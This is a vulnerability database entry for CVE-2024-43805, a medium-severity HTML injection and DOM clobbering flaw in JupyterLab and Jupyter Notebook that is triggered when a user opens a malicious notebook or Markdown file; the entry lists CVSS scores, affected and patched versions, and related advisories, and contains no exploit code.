CVE-2024-43805Cross-site Scripting in Jupyterlab

CWE-79Cross-site Scripting6 documents5 sources
Severity
6.1MEDIUMNVD
CNA7.6
EPSS
0.4%
top 37.48%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
3
JupyterlabJupyter JupyterlabJupyter Notebook
Timeline
PublishedAug 28
Latest updateAug 29

Description

jupyterlab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook Architecture. This vulnerability depends on user interaction by opening a malicious notebook with Markdown cells, or Markdown file using JupyterLab preview feature. A malicious user can access any data that the attacked user has access to as well as perform arbitrary requests acting as the attacked user. JupyterLab v3.6.8, v4.2.5 and Jupyter Notebook v7.2.2 have been patched to resol

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NExploitability: 2.8 | Impact: 2.7

Affected Packages6 packages

NVDjupyter/jupyterlab4.0.04.2.5+1
PyPIjupyterlab/jupyterlab4.0.04.2.5+1
Debianjupyterlab/jupyterlab< 4.0.11+ds1+~cs11.25.27-3+1
CVEListV5jupyterlab/jupyterlabjupyterlab: < 3.6.8, jupyterlab: >= 4.0.0, < 4.2.5, notebook: >= 7.0.0, <= 7.2.2+2
NVDjupyter/notebook7.0.07.2.2

🔴Vulnerability Details

4
GHSA
HTML injection in Jupyter Notebook and JupyterLab leading to DOM Clobbering2024-08-29
OSV
HTML injection in Jupyter Notebook and JupyterLab leading to DOM Clobbering2024-08-29
CVEList
HTML injection in Jupyter Notebook and JupyterLab leading to DOM Clobbering2024-08-28
OSV
CVE-2024-43805: jupyterlab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook Architecture2024-08-28

📋Vendor Advisories

1
Debian
CVE-2024-43805: jupyter-notebook - jupyterlab is an extensible environment for interactive and reproducible computi...2024
CVE-2024-43805 — Cross-site Scripting in Jupyterlab | cvebase